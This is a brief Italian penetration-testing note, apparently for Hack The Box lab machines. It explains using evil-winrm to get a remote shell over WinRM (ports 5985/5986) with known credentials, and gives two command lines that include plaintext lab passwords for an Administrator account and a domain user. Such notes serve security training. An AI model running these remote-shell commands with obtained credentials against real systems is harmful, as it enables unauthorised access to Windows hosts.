tags: Evil-WinRM Windows Connessione_Windows WinRM
Nel caso possedessimo le credenziali e la porta 5985 o 5986 fosse aperta il miglior modo per avere una reverse shell stabile è quello di usare questo programma in questo modo:
evil-winrm -i 10.129.37.56 -u Administrator -p 'MEGACORP_4dm1n!!'Se non funziona prova ad aggiungere il dominio:
evil-winrm -i cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8'